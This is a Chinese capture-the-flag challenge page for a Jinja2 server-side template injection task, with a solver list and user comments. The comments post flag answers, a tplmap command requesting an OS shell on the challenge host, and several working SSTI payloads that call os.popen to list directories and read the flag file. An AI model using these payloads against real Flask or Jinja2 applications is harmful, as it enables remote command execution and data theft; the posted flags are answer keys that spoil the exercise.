Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16396
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
一只小白鲸 攻破了该题 1天前
Wu. 攻破了该题 3天前
tiger1cyd 攻破了该题 3天前
qq1002517 攻破了该题 4天前
乱来小木 攻破了该题 4天前
yttitan 攻破了该题 5天前
hdcc1 攻破了该题 5天前
WYYYYTT 攻破了该题 9天前
有点易斯但不多 攻破了该题 10天前
1907104474 攻破了该题 10天前
xiaoxiaojiangshi 攻破了该题 11天前
scv 攻破了该题 11天前
flag大王 攻破了该题 12天前
藏在云层里的羊 攻破了该题 13天前
xyqsin 攻破了该题 14天前
一定要做这些吗 攻破了该题 17天前
爱意藏入虚空 攻破了该题 17天前
chenzhong 攻破了该题 19天前
kiritoldws 攻破了该题 20天前
评论
L_ergo 3年前
举报
flag{968946be81a675c24c0bef227383ba70}
shansang 3年前
举报
python3 ./tplmap.py -u http://114.67.175.224:13633/?flag --engine=Jinja2 --os-shell
热热热热热若 3年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
starrabbit 3年前
举报
也可通过tplmap工具直接获取权限
hxl223 3年前
举报
flag{23de1e599ad6abcc6c446e355e72c807}
nepw 3年前
举报
通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 通过{{ config.__c
DK2021 3年前
举报
/?flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
453137 3年前
举报
flag={{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}
earlyyue 3年前
举报
/?flag={{lipsum.__globals__.os.popen('cat /app/flag').read()}}
氕氘氚 3年前
举报
flag{0c6e1431cbe4e002c413bcaa0e5dfa51}